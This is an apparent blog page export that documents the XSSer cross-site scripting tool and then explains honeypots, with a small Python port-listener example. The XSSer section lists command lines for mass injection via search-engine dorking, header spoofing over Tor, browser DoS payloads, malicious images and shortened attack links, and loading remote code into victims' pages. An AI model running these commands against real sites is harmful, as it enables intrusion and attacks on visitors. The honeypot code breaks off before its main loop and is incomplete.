<br />
<br /><b><u>*Special Technique(s)*:</u></b>
<br />These options can be used to try to inject code using different types of XSS techniques. You can select multiple:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Coo<span class="Apple-tab-span" style="white-space: pre; "> </span>COO - Cross Site Scripting Cookie injection
<br />--Xsa<span class="Apple-tab-span" style="white-space: pre; "> </span>XSA - Cross Site Agent Scripting
<br />--Xsr<span class="Apple-tab-span" style="white-space: pre; "> </span>XSR - Cross Site Referer Scripting
<br />--Dcp<span class="Apple-tab-span" style="white-space: pre; "> </span>DCP - Data Control Protocol injections
<br />--Dom<span class="Apple-tab-span" style="white-space: pre; "> </span>DOM - Use Anchor Stealth (DOM shadows!)
<br />--Ind<span class="Apple-tab-span" style="white-space: pre; "> </span>IND - HTTP Response Splitting Induced code
<br />--Anchor<span class="Apple-tab-span" style="white-space: pre; "> </span>ANC - Use Anchor Stealth payloader (DOM shadows!)</blockquote>
<br /><b><u>*Select Final injection(s)*:</u></b>
<br />These options specify the final code to inject in vulnerable target(s). This matters if you want to exploit your discovered vulnerabilities in the wild.
<br />Choose only one option:
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Fp=FINALPAYLOAD<span class="Apple-tab-span" style="white-space: pre; "> </span>OWN - Insert your final code to inject -manually-
<br />--Fr=FINALREMOTE<span class="Apple-tab-span" style="white-space: pre; "> </span>REMOTE - Insert your final code to inject -remotelly-
<br />--Doss<span class="Apple-tab-span" style="white-space: pre; "> </span>DOSs - XSS Denial of service (server) injection
<br />--Dos<span class="Apple-tab-span" style="white-space: pre; "> </span>DOS - XSS Denial of service (client) injection
<br />--B64<span class="Apple-tab-span" style="white-space: pre; "> </span>B64 - Base64 code encoding in META tag (rfc2397)</blockquote>
<br /><b><u>*Special Final injection(s)*:</u></b>
<br />These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--Onm<span class="Apple-tab-span" style="white-space: pre; "> </span>ONM - Use onMouseMove() event to inject code
<br />--Ifr<span class="Apple-tab-span" style="white-space: pre; "> </span>IFR - Use "iframe" source tag to inject code</blockquote>
<br /><b><u>*Miscellaneous*:</u></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">--silent<span class="Apple-tab-span" style="white-space: pre; "> </span>inhibit console output results
<br />--update<span class="Apple-tab-span" style="white-space: pre; "> </span>check for XSSer latest stable version
<br />--save<span class="Apple-tab-span" style="white-space: pre; "> </span>output all results directly to template (XSSlist.dat)
<br />--xml=FILEXML<span class="Apple-tab-span" style="white-space: pre; "> </span>output 'positives' to aXML file (--xml filename.xml)
<br />--publish<span class="Apple-tab-span" style="white-space: pre; "> </span>output 'positives' to Social Networks (identi.ca)
<br />--short=SHORTURLS<span class="Apple-tab-span" style="white-space: pre; "> </span>display -final code- shortered (tinyurl, is.gd)
<br />--launch<span class="Apple-tab-span" style="white-space: pre; "> </span>launch a browser at the end with each XSS discovered</blockquote><b><u><span class="Apple-style-span" style="font-size: large; ">Examples</span></u></b>
<br />
<br />If you have interesting examples of usage about XSSer, please send an email to the mailing list.
<br />
<br />-------------------
<br /><b>* Simple injection from URL:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com"</blockquote>-------------------
<br /><b>* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" </blockquote>-------------------
<br /><b>* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w</blockquote>-------------------
<br /><b>* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, change payload to hexadecimal; second, change the first encoding to StringFromCharCode; third, re-encode the second encoding to Hexadecimal), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"</blockquote>-------------------
<br /><b>* Advanced injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une</blockquote>-------------------
<br /><b>* Injection from Dork selecting "duck" engine (XSSer Storm!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py --De "duck" -d "search.php?"</blockquote>-------------------
<br /><b>* Injection from Crawler with depth 3 and 4 pages to see (XSSer Spider!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -c3 --Cw=4 -u "http://host.com"</blockquote>-------------------
<br /><b>* Simple injection from URL, using POST, with statistics results:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s</blockquote>-------------------
<br /><b>* Multiple injections from URL to a parameter sent with GET, using automatic payloading, with IP Octal payload obfuscation and printing results in a "tinyurl" shortened link (ready for share!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl </blockquote>-------------------
<br /><b>* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"</blockquote>-------------------
<br /><b>* Simple injection from URL, using GET and trying to generate from the results a "malicious" shortened link (is.gd) with a valid DoS (Denial of Service) browser client payload:</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"</blockquote>-------------------
<br /><b>* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found. (real playing mode!): </b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"</blockquote>-------------------
<br /><b>* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!" </blockquote>-------------------
<br /><b>* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to an XML file.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml" </blockquote>-------------------
<br /><b>* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca</b>
<br /><b>(federated XSS pentesting botnet)</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -d "login.php" --De "duck" --publish</blockquote>
<br /><b><span class="Apple-style-span" style="font-size: large; ">* <u>Examples online:</u></span></b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">- http://identi.ca/xsserbot01
<br />- http://twitter.com/xsserbot01</blockquote>-------------------
<br /><b>* Create a .swf movie with XSS code injected</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); "><b>$ python xsser.py --fla "name_of_file"</b></blockquote>-------------------
<br /><b>* Send a pre-checking hash to see if target will generate -false positive- results</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" --hash</blockquote>-------------------
<br /><b>* Multiple fuzzing injections from URL, including DCP injections and exploiting our "own" code, spoofed in a shortened link, on positive results found. XSS real-time exploiting.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"</blockquote>-------------------
<br /><b>* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64</blockquote>-------------------
<br /><b>* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly</b>
<br />
<br /><blockquote style="overflow-x: hidden; overflow-y: hidden; padding-left: 9px; font-style: italic; color: rgb(102, 102, 102); border-left-width: 3px; border-left-style: solid; border-left-color: rgb(202, 218, 231); ">$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch</blockquote>
<br /><b><u><span class="Apple-style-span" style="font-size: large; ">ScreenShots:</span></u></b>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUCoI-zhNp-9RRz09M0rT816bfs9Epdk9BvloucgD4MwOsYFlKndVoC0g1OSMDs3SANsUylZoP23qcga-LFjUkk-l2RiCjkSy9RVs2yNGq0wxSc7lhxZnONJ6eI5_KGowUlZmO99O7y3Y/s1600/xsser_core_report.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUCoI-zhNp-9RRz09M0rT816bfs9Epdk9BvloucgD4MwOsYFlKndVoC0g1OSMDs3SANsUylZoP23qcga-LFjUkk-l2RiCjkSy9RVs2yNGq0wxSc7lhxZnONJ6eI5_KGowUlZmO99O7y3Y/s320/xsser_core_report.png" width="320" alt="xsser_core_report" title="xsser_core_report" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij2QWgvW-z5H97XDY4vecbmeTgcWxZBx2t8jyOFWsjLg1nd5g1C_FAg5vSvVSmA8-kXOf8oecmeUwjINmI4MPcampndyLx5PtMpgDKEQ2SH_VZkgH_OZ4DFLtK2zB4dgDKWtQLSWqekE0/s1600/xsser_dcp_sm.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij2QWgvW-z5H97XDY4vecbmeTgcWxZBx2t8jyOFWsjLg1nd5g1C_FAg5vSvVSmA8-kXOf8oecmeUwjINmI4MPcampndyLx5PtMpgDKEQ2SH_VZkgH_OZ4DFLtK2zB4dgDKWtQLSWqekE0/s1600/xsser_dcp_sm.png" alt="xsser_dcp_sm" title="xsser_dcp_sm" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1Y40PN_kB7WSzys0_UgapNXPmOeND54mXP8o2uUVv2XfD-0yO5T4oyqjk9tW6vpViGsz_8Mt-Upu1cTddx7uHShyphenhyphenhjf4yjlLigJocMz_NNbumhuiecERyrM2DLS3ckhHjlIXrQaI2n8/s1600/xsser_finalcode.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK1Y40PN_kB7WSzys0_UgapNXPmOeND54mXP8o2uUVv2XfD-0yO5T4oyqjk9tW6vpViGsz_8Mt-Upu1cTddx7uHShyphenhyphenhjf4yjlLigJocMz_NNbumhuiecERyrM2DLS3ckhHjlIXrQaI2n8/s320/xsser_finalcode.png" width="320" alt="xsser_finalcode" title="xsser_finalcode" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkwnapQSLNWIQxqVL5Xtk92e5WpP_DHZx-j0G1ZeMiBTAFi4-RMK-BFL-ZlRltvLt-E9pxycNDGUGQ81xgPveudKPiFqbCvnCqU5wLw0TkIe2P-hnUFAHmJOVGpM0Np1aKYN1Ck08f4E8/s1600/xsser_gtk3.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkwnapQSLNWIQxqVL5Xtk92e5WpP_DHZx-j0G1ZeMiBTAFi4-RMK-BFL-ZlRltvLt-E9pxycNDGUGQ81xgPveudKPiFqbCvnCqU5wLw0TkIe2P-hnUFAHmJOVGpM0Np1aKYN1Ck08f4E8/s320/xsser_gtk3.png" width="320" alt="xsser_gtk3" title="xsser_gtk3" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8ucUgoLtAGIsSM-u-7dLFhxhfLDnankSISTqBHkOeA6sniOOBaxXHqM4qdA2CztvvdHzG3akFUxtvmFjSQBKEoGfnvQsZqn-qZGck8uVRbo-f7k5fhtJi0oMukFHK4F1YpBWNJeD4_Vo/s1600/xsser_help.png" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8ucUgoLtAGIsSM-u-7dLFhxhfLDnankSISTqBHkOeA6sniOOBaxXHqM4qdA2CztvvdHzG3akFUxtvmFjSQBKEoGfnvQsZqn-qZGck8uVRbo-f7k5fhtJi0oMukFHK4F1YpBWNJeD4_Vo/s320/xsser_help.png" width="320" alt="xsser_help" title="xsser_help" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div><b><u><span class="Apple-style-span" style="font-size: large; ">
<br /></span></u></b>
<br />
<br /><b><u>Download:<span class="Apple-style-span" ><span class="Apple-style-span" style="outline-width: initial; outline-color: initial;"><a href="http://xsser.sourceforge.net/#download">http://xsser.sourceforge.net/#download</a></span></span></u></b></div></div><p></p><div class="postmeta-secondary" style="color: rgb(135, 135, 135); font-size: 11px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; ">
<br /></div></div></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-26699797570182422752011-09-04T01:40:00.000-07:002011-09-04T01:48:23.809-07:00HONEY POT Trap Hackers<span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><div class="postmeta-primary" style="text-transform: uppercase; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-bottom: 10px; "><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px; line-height: 20px;"><b>
<br /></b></span></span><span class="Apple-style-span" ><span class="meta_comments" style="padding-top: 3px; padding-right: 0px; padding-bottom: 3px; padding-left: 10px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHMAQqoqEdYxz4idNYm_9NxuT32FBFnFVY9TwdgQRox0rhsYHpgHA5nnNV8j47InC-UU7KvaSKLEwWeVOLq5TDV1cTfethNA_hu4PCHB25KD3NwPa-aX6JqtL4GdZmIin3Kz7CiYtN2G8/s1600/meta-separator.png); background-position: 0% 50%; background-repeat: no-repeat no-repeat; font-size: 11px;"></span></span></div><div class="post-body entry-content" style="color: rgb(84, 84, 84); margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 10px; padding-bottom: 5px; padding-left: 10px; font-family: Arial, Verdana; font-size: 12px; line-height: 20px; "><p></p><div style="border-top-left-radius: 15px 15px; border-top-right-radius: 15px 15px; border-bottom-right-radius: 15px 15px; border-bottom-left-radius: 15px 15px; border-top-color: rgb(104, 104, 104); border-right-color: rgb(104, 104, 104); border-bottom-color: rgb(104, 104, 104); border-left-color: rgb(104, 104, 104); border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; padding-top: 10px; padding-right: 10px; padding-bottom: 10px; padding-left: 10px; "><div id="element" style="height: 500px; overflow-x: auto; overflow-y: auto; "><b>What is HoneyPot??</b>
<br />In layman's terms, a honeypot is a trap set by administrators for hackers: it fools them into believing that they are hacking into the admin's system, while in fact the hackers are getting hacked by the admin.
<br />
<br /><b>How does this work??</b>
<br />This works by presenting the hackers with a fake scenario: the hacker thinks he is penetrating the system, but he is going nowhere and is only playing in a world created by the admins. This lets the admins observe all of the hackers' malicious activity, such as which ports they are trying to connect to, which files they are trying to upload, and which sections they are trying to access.
<br />
<br />A HoneyPot is mainly designed to trap hackers, or to present them with a virtual system that does not really exist.
<br />
<br />Technically, a honeypot tries to listen on all the ports of the system. Whenever a hacker port scans the system, he gets a list of ports that he thinks are open, but these are actually the open ports presented by the honeypot behind the firewall. So whenever the hacker tries to access some random port, say 100, he is accessing the honeypot, not the system.
<br />
<br />The above scenario can be visualised better as follows: install VMware on a system, run any old version of Windows or Linux in it with all ports open, and port forward those ports on the host system. Whenever a hacker tries to fingerprint or port scan the system, he will be getting information about the VMware guest, not the host system. The hacker may be able to penetrate the VMware guest OS, but our HOST OS remains safe.
<br />
<br />But doing the above job by hand is difficult, so a special application called a HONEYPOT is created to do this job and many others, such as tracking of packets, file access, etc.
<br />
<br /><b>There are mainly 3 types of honeypots available:</b>
<br />1. Small: Mainly keeps a log of the IP addresses that are trying to access your system, along with the port.
<br />2. Medium: Its functionality is a little more advanced, keeping track of files accessed, time period, hosts, etc.
<br />3. Large: It provides all the functionality, but the main feature of this kind of honeypot is security: these can simulate a virtual OS for outsiders or hackers very well.
<br />
<br />In this article I am going to give an example of a small-scale HoneyPot for Windows.
<br />HoneyPots are available both as commercial products and as open source. I am taking the example of KFSensor, which is freely available here.
<br />STEP 1: Download KFSensor and WinPcap from their websites and install them.
<br />STEP 2: Restart your system, then start the WinPcap server from the folder menu where it is saved, mainly in the c:\ drive.
<br />STEP 3: Start KFSensor and do as prompted in the window; this is mainly for configuring your new HONEYPOT.
<br />STEP 4: Done. Keep your system up for the packet scanning.
<br />
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMN1Toyxnh8roi7d6wuOswYaeWHx59QKEq4TnYcqV7MgDcxZqm_3Pz3oSj-UA4eSAW5eLWUhsbjmi0ai8vu7oeFVdavzO3iZnv6OTjeTUyZUsH7ykBZRDe6ccDd81QssKrdFu1TO8gRnY/s1600/untitled.jpg" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="279" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMN1Toyxnh8roi7d6wuOswYaeWHx59QKEq4TnYcqV7MgDcxZqm_3Pz3oSj-UA4eSAW5eLWUhsbjmi0ai8vu7oeFVdavzO3iZnv6OTjeTUyZUsH7ykBZRDe6ccDd81QssKrdFu1TO8gRnY/s400/untitled.jpg" alt="untitled" title="untitled" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br />In the picture above you can see that some port numbers are struck out. This is because you need to restart the system, then start your honeypot, and only then the internet connection. Otherwise these ports will be taken by the network connection first, the honeypot will not be able to access them, and no information gathering will be possible.
<br />
<br />We can also create our own small honeypot whose main function is to check for incoming packets.
<br />It is nothing more than a basic client-server program that listens on all ports.
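<br />A minimal listener of the kind described above, written here as an added example (it is not the program shown in the screenshot). It binds a set of TCP and UDP ports, reports any port that is already taken (the "struck out" case mentioned earlier), and logs each probe with a terminal bell as the alert; the default port lists are assumptions chosen for illustration.

```python
"""Low-interaction honeypot listener: binds TCP and UDP ports and logs probes."""
import selectors
import socket
import time

MAX_CAPTURE = 256  # bytes of each probe kept for the log


def open_listeners(host, tcp_ports, udp_ports):
    """Bind every requested port. Returns (selector, bound, failed)."""
    sel = selectors.DefaultSelector()
    bound, failed = [], []
    for proto, kind, ports in (("tcp", socket.SOCK_STREAM, tcp_ports),
                               ("udp", socket.SOCK_DGRAM, udp_ports)):
        for port in ports:
            sock = socket.socket(socket.AF_INET, kind)
            try:
                # No SO_REUSEADDR: a port another service already holds must
                # fail loudly, since the honeypot would see nothing on it.
                sock.bind((host, port))
                if proto == "tcp":
                    sock.listen(16)
            except OSError as exc:
                failed.append((proto, port, exc.strerror or str(exc)))
                sock.close()
                continue
            sock.setblocking(False)
            sel.register(sock, selectors.EVENT_READ, proto)
            bound.append((proto, sock.getsockname()[1]))
    return sel, bound, failed


def poll_once(sel, timeout=1.0):
    """Wait up to `timeout` seconds and return one event dict per probe seen."""
    events = []
    for key, _mask in sel.select(timeout):
        sock, proto = key.fileobj, key.data
        try:
            if proto == "udp":
                data, peer = sock.recvfrom(65535)
            else:
                conn, peer = sock.accept()
                conn.settimeout(0.5)  # never let a silent client stall the loop
                try:
                    data = conn.recv(MAX_CAPTURE)
                except OSError:       # timeout or reset: log the connect alone
                    data = b""
                finally:
                    conn.close()
        except OSError:
            continue  # probe vanished between select() and the read
        events.append({
            "time": time.strftime("%Y-%m-%dT%H:%M:%S%z"),
            "proto": proto,
            "port": sock.getsockname()[1],
            "src": peer[0],
            "sport": peer[1],
            "payload": data[:MAX_CAPTURE],
        })
    return events


def format_event(ev):
    """One log line per probe; payload is hex so binary scans stay readable."""
    return "{time} {proto}/{port} from {src}:{sport} len={n} data={hexdata}".format(
        n=len(ev["payload"]), hexdata=ev["payload"].hex() or "-", **ev)


if __name__ == "__main__":
    # Constructed defaults: commonly scanned ports. Ports below 1024 need
    # administrator/root rights; change the lists to suit your own network.
    sel, bound, failed = open_listeners(
        "0.0.0.0", [21, 23, 80, 445, 3389, 8080], [53, 137, 161, 1900])
    for proto, port, why in failed:
        print(f"cannot watch {proto}/{port}: {why}")
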